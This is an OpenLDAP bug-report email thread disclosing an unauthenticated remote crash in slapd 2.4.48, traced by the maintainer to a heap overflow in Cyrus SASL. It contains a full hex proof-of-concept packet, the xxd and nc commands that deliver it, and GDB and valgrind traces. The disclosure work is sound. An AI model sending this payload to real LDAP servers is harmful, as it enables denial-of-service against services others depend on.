Full_Name: Stephan Zeisberg Version: 2.4.48 OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64) URL: Submission from: (NULL) (78.54.65.139) Dear openldap team � # Issue description Unauthenticated remote denial-of-service through malformed ldap packet # Version openldap-2.4.48.tgz # How to reproduce ## Compile $ tar xzvf openldap-2.4.48.tgz $ cd openldap-2.4.48 $ ./configure --prefix=/tmp/openldap $ make depend $ make $ make install $ cd /tmp/openldap ## Start server $ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091 ## Create PoC crash file $ echo -n "30840000054b020200d76084000005410201030400a38400000500a38203e2618203de308203daa003020105a1151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e766d6e6574312e766d2e626173651b1377326b332e766d6e65a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8cf3b643a2d7d3111e0aebe0eef97130b4506cbf28b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d79567bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfd0fbd3bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf00000000000000febfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821831e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ed151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e762d37343237323839373736333432303739363739766d6e6574312e766d2e62617365a382037430820370a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8c2d36313031373033343136323732353138393733b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d795679594064442bcb1ecb8639a7ef1825665683557bad4839e1a7b3cc5b76fc0ac093dcc62dd34116e7f202e38118c94c6ee468ae137aa6fce3070c081dd3941889887aac17b7b9fae6b1b432f97a905fe0765df558d738b2debc47b19b59b1c9b455cc29b88eb64620b8928714e76b310d36df7c1bfbda3fb4fbdc1fd4f34c901801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821931e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede1" | xxd -r -p > ldap.crash ## Execute PoC (may need to be executed multiple times) $ nc 127.0.0.1 9091 < ldap.crash # GDB ... slapd: malloc.c:2379: sysmalloc: Assertion `(old_top == initial_top (av) && old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top) && ((unsigned long) old_end & (pagesize - 1)) == 0)' failed. Thread 3 "slapd" received signal SIGABRT, Aborted. [Switching to Thread 0x7fffb4aba700 (LWP 3684510)] 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6 Missing separate debuginfos, use: dnf debuginfo-install cyrus-sasl-gssapi-2.1.27-2.fc31.x86_64 cyrus-sasl-lib-2.1.27-2.fc31.x86_64 cyrus-sasl-plain-2.1.27-2.fc31.x86_64 keyutils-libs-1.6-3.fc31.x86_64 krb5-libs-1.17-45.fc31.x86_64 l ibcom_err-1.45.3-1.fc31.x86_64 libdb-5.3.28-38.fc31.x86_64 libgcc-9.2.1-1.fc31.x86_64 libicu-63.2-3.fc31.x86_64 libselinux-2.9-5.fc31.x86_64 libstdc++-9.2.1-1.fc31.x86_64 libuuid-2.34-3.fc31.x86_64 nss-mdns-0.14.1-4.fc31.x86_64 open ssl-libs-1.1.1d-2.fc31.x86_64 zlib-1.2.11-20.fc31.x86_64 (gdb) bt #0 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6 #1 0x00007ffff5b238d9 in abort () from /lib64/libc.so.6 #2 0x00007ffff5b85a7a in __malloc_assert () from /lib64/libc.so.6 #3 0x00007ffff5b882bf in sysmalloc () from /lib64/libc.so.6 #4 0x00007ffff5b89072 in _int_malloc () from /lib64/libc.so.6 #5 0x00007ffff5b8af55 in calloc () from /lib64/libc.so.6 #6 0x00007ffff5b7ced8 in open_memstream () from /lib64/libc.so.6 #7 0x00007ffff5bf99d5 in __vsyslog_internal () from /lib64/libc.so.6 #8 0x00007ffff5bf9f4a in syslog () from /lib64/libc.so.6 #9 0x00000000004ef3b4 in slap_sasl_log (context=0x7ffff54bf110, priority=<optimized out>, message=0x7fffa8103d30 "Couldn't find mech a\202\003\336\060\202\003ڠ\003\002\001\005\241\025\033\023W2K3.VMNET1.VM.BASE\242D0B\240\003\002\001\002\241;09\033\004ldap\033\034w9\335\063-101.w2k3.vmnet1.vm.base\033\023w2k3.vmne\240\003\002\001\027\241\003\002\001\b\242\202\003b\004\202\003^\242\065\252\353K\215\255,\301\246\177T\333\003\003R\314\064\206L\214\363\266C\242\327\323\021\036\n\353\340\356\371q0\264Pl\277(\260\034l+\264\232\355\355\t\270dN\301FҔ\t\327\030\070\030{\023Z\247y"...) at sasl.c:146 #10 0x00007ffff6203344 in sasl_seterror () from /lib64/libsasl2.so.3 #11 0x00007ffff6202324 in sasl_server_start () from /lib64/libsasl2.so.3 #12 0x00000000004f1098 in slap_sasl_bind (op=<optimized out>, rs=0x7fffb4ab88b0) at sasl.c:1524 #13 0x000000000049fd28 in fe_op_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at bind.c:280 #14 0x000000000049f350 in do_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at bind.c:205 #15 0x0000000000472ca8 in connection_operation (ctx=0x7fffb4ab89e8, arg_v=0x7fffa8003120) at connection.c:1158 #16 0x0000000000471332 in connection_read_thread (ctx=0x7fffb4ab89e8, argv=<optimized out>) at connection.c:1294 #17 0x00000000005fee7a in ldap_int_thread_pool_wrapper (xpool=0xa0b9f10) at tpool.c:696 #18 0x00007ffff5e444e2 in start_thread () from /lib64/libpthread.so.0 #19 0x00007ffff5bff693 in clone () from /lib64/libc.so.6 Please let me know what additional information I can provide to successfully reproduce the issue. Note: I have also tested and reproduced the issue using the precompiled package from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP: slapd 2.4.47 (Jul 25 2019 00:00:00)) -Stephan Zeisberg
stephan@srlabs.de wrote: > Full_Name: Stephan Zeisberg > Version: 2.4.48 > OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64) > URL: > Submission from: (NULL) (78.54.65.139) > > > Dear openldap team — > > # Issue description > > Unauthenticated remote denial-of-service through malformed ldap packet > > # Version > > openldap-2.4.48.tgz > > # How to reproduce > > ## Compile > > $ tar xzvf openldap-2.4.48.tgz > $ cd openldap-2.4.48 > $ ./configure --prefix=/tmp/openldap > $ make depend > $ make > $ make install > $ cd /tmp/openldap > > ## Start server > > $ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091 > > ## Create PoC crash file > > $ echo -n "30840000054b020200d76084000005410201030400a38400000500a38203e2618203de308203daa003020105a1151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e766d6e6574312e766d2e626173651b1377326b332e766d6e65a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8cf3b643a2d7d3111e0aebe0eef97130b4506cbf28b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d79567bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfd0fbd3bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfb > fbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf00000000000000febfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821831e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ed151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e762d373432373238393737 > 36333432303739363739766d6e6574312e766d2e62617365a382037430820370a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8c2d36313031373033343136323732353138393733b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d795679594064442bcb1ecb8639a7ef1825665683557bad4839e1a7b3cc5b76fc0ac093dcc62dd34116e7f202e38118c94c6ee468ae137aa6fce3070c081dd3941889887aac17b7b9fae6b1b432f97a905fe0765df558d738b2debc47b19b59b1c9b455cc29b88eb64620b8928714e76b310d36df7c1bfbda3fb4fbdc1fd4f34c901801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821931e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede1" > | xxd -r -p > ldap.crash > > ## Execute PoC (may need to be executed multiple times) > > $ nc 127.0.0.1 9091 < ldap.crash > > > > # GDB > > ... > slapd: malloc.c:2379: sysmalloc: Assertion `(old_top == initial_top (av) && > old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top) > && ((unsigned long) old_end & (pagesize - 1)) == 0)' failed. > > Thread 3 "slapd" received signal SIGABRT, Aborted. > [Switching to Thread 0x7fffb4aba700 (LWP 3684510)] > 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6 > Missing separate debuginfos, use: dnf debuginfo-install > cyrus-sasl-gssapi-2.1.27-2.fc31.x86_64 cyrus-sasl-lib-2.1.27-2.fc31.x86_64 > cyrus-sasl-plain-2.1.27-2.fc31.x86_64 keyutils-libs-1.6-3.fc31.x86_64 > krb5-libs-1.17-45.fc31.x86_64 l > ibcom_err-1.45.3-1.fc31.x86_64 libdb-5.3.28-38.fc31.x86_64 > libgcc-9.2.1-1.fc31.x86_64 libicu-63.2-3.fc31.x86_64 > libselinux-2.9-5.fc31.x86_64 libstdc++-9.2.1-1.fc31.x86_64 > libuuid-2.34-3.fc31.x86_64 nss-mdns-0.14.1-4.fc31.x86_64 open > ssl-libs-1.1.1d-2.fc31.x86_64 zlib-1.2.11-20.fc31.x86_64 > (gdb) bt > #0 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6 > #1 0x00007ffff5b238d9 in abort () from /lib64/libc.so.6 > #2 0x00007ffff5b85a7a in __malloc_assert () from /lib64/libc.so.6 > #3 0x00007ffff5b882bf in sysmalloc () from /lib64/libc.so.6 > #4 0x00007ffff5b89072 in _int_malloc () from /lib64/libc.so.6 > #5 0x00007ffff5b8af55 in calloc () from /lib64/libc.so.6 > #6 0x00007ffff5b7ced8 in open_memstream () from /lib64/libc.so.6 > #7 0x00007ffff5bf99d5 in __vsyslog_internal () from /lib64/libc.so.6 > #8 0x00007ffff5bf9f4a in syslog () from /lib64/libc.so.6 > #9 0x00000000004ef3b4 in slap_sasl_log (context=0x7ffff54bf110, > priority=<optimized out>, > message=0x7fffa8103d30 "Couldn't find mech > a\202\003\336\060\202\003ڠ\003\002\001\005\241\025\033\023W2K3.VMNET1.VM.BASE\242D0B\240\003\002\001\002\241;09\033\004ldap\033\034w9\335\063-101.w2k3.vmnet1.vm.base\033\023w2k3.vmne\240\003\002\001\027\241\003\002\001\b\242\202\003b\004\202\003^\242\065\252\353K\215\255,\301\246\177T\333\003\003R\314\064\206L\214\363\266C\242\327\323\021\036\n\353\340\356\371q0\264Pl\277(\260\034l+\264\232\355\355\t\270dN\301FҔ\t\327\030\070\030{\023Z\247y"...) > at sasl.c:146 > #10 0x00007ffff6203344 in sasl_seterror () from /lib64/libsasl2.so.3 > #11 0x00007ffff6202324 in sasl_server_start () from /lib64/libsasl2.so.3 > #12 0x00000000004f1098 in slap_sasl_bind (op=<optimized out>, rs=0x7fffb4ab88b0) > at sasl.c:1524 > #13 0x000000000049fd28 in fe_op_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at > bind.c:280 > #14 0x000000000049f350 in do_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at > bind.c:205 > #15 0x0000000000472ca8 in connection_operation (ctx=0x7fffb4ab89e8, > arg_v=0x7fffa8003120) at connection.c:1158 > #16 0x0000000000471332 in connection_read_thread (ctx=0x7fffb4ab89e8, > argv=<optimized out>) at connection.c:1294 > #17 0x00000000005fee7a in ldap_int_thread_pool_wrapper (xpool=0xa0b9f10) at > tpool.c:696 > #18 0x00007ffff5e444e2 in start_thread () from /lib64/libpthread.so.0 > #19 0x00007ffff5bff693 in clone () from /lib64/libc.so.6 > > Please let me know what additional information I can provide to successfully > reproduce the issue. > > Note: I have also tested and reproduced the issue using the precompiled package > from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP: > slapd 2.4.47 (Jul 25 2019 00:00:00)) Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting this issue to them. valgrind confirms it as well: 5ddfddde do_bind: dn () SASL mech a��0�ڠ�2K3.VMNET1.VM.BASE�D0B��;09dap9�3-101.w2k3.vmnet1.vm.base2k3.vmne���b�^�5��K��,��T�R�4�L��C��� ����q0�Pl�(�l+���� �dN�FҔ �8{Z�y�>5dz�,� S�Q��K�ɀ�\Ѱ��7���'וg���������������������������������������������������������������������������������������������������������ӿ�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� 5ddfddde ==> sasl_bind: dn="" mech=a��0�ڠ�2K3.VMNET1.VM.BASE�D0B��;09dap9�3-101.w2k3.vmnet1.vm.base2k3.vmne���b�^�5��K��,��T�R�4�L��C��� ����q0�Pl�(�l+���� �dN�FҔ �8{Z�y�>5dz�,� S�Q��K�ɀ�\Ѱ��7���'וg���������������������������������������������������������������������������������������������������������ӿ�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� datalen=0 ==11019== Thread 3: ==11019== Invalid write of size 1 ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) ==11019== by 0x21E130: fe_op_bind (bind.c:279) ==11019== by 0x21DCE1: do_bind (bind.c:205) ==11019== by 0x1F35BA: connection_operation (connection.c:1185) ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) ==11019== by 0x4EFA322: clone (clone.S:95) ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) ==11019== by 0x4B93299: _sasl_add_string (common.c:196) ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) ==11019== by 0x21E130: fe_op_bind (bind.c:279) ==11019== by 0x21DCE1: do_bind (bind.c:205) ==11019== by 0x1F35BA: connection_operation (connection.c:1185) ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) ==11019== ==11019== Invalid read of size 1 ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688) ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114) ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) ==11019== by 0x21E130: fe_op_bind (bind.c:279) ==11019== by 0x21DCE1: do_bind (bind.c:205) ==11019== by 0x1F35BA: connection_operation (connection.c:1185) ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) ==11019== by 0x4B93299: _sasl_add_string (common.c:196) ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) ==11019== by 0x21E130: fe_op_bind (bind.c:279) ==11019== by 0x21DCE1: do_bind (bind.c:205) ==11019== by 0x1F35BA: connection_operation (connection.c:1185) ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) -- -- Howard Chu CTO, Symas Corp. http://www.symas.com Director, Highland Sun http://highlandsun.com/hyc/ Chief Architect, OpenLDAP http://www.openldap.org/project/
Resending with the non-printable chars omitted: Howard Chu wrote: > Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting > this issue to them. > > valgrind confirms it as well: > > 5ddfddde do_bind: dn () SASL mech <garbage> > 5ddfddde ==> sasl_bind: dn="" mech=<garbage> > datalen=0 > ==11019== Thread 3: > ==11019== Invalid write of size 1 > ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > ==11019== by 0x4EFA322: clone (clone.S:95) > ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd > ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) > ==11019== by 0x4B93299: _sasl_add_string (common.c:196) > ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > ==11019== > ==11019== Invalid read of size 1 > ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688) > ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114) > ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) > ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) > ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd > ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) > ==11019== by 0x4B93299: _sasl_add_string (common.c:196) > ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > > > > -- -- Howard Chu CTO, Symas Corp. http://www.symas.com Director, Highland Sun http://highlandsun.com/hyc/ Chief Architect, OpenLDAP http://www.openldap.org/project/
Hi Howard — Thanks for the quick reply. Will forward the report upstream to Cyrus SASL. Best -Stephan On 11/28/19 3:54 PM, Howard Chu wrote: > Resending with the non-printable chars omitted: > > Howard Chu wrote: >> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting >> this issue to them. >> >> valgrind confirms it as well: >> >> 5ddfddde do_bind: dn () SASL mech <garbage> >> 5ddfddde ==> sasl_bind: dn="" mech=<garbage> >> datalen=0 >> ==11019== Thread 3: >> ==11019== Invalid write of size 1 >> ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) >> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >> ==11019== by 0x21DCE1: do_bind (bind.c:205) >> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >> ==11019== by 0x4EFA322: clone (clone.S:95) >> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd >> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) >> ==11019== by 0x4B93299: _sasl_add_string (common.c:196) >> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) >> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >> ==11019== by 0x21DCE1: do_bind (bind.c:205) >> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >> ==11019== >> ==11019== Invalid read of size 1 >> ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >> ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688) >> ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114) >> ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) >> ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) >> ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) >> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >> ==11019== by 0x21DCE1: do_bind (bind.c:205) >> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd >> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) >> ==11019== by 0x4B93299: _sasl_add_string (common.c:196) >> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) >> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >> ==11019== by 0x21DCE1: do_bind (bind.c:205) >> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >> >> >> >> >
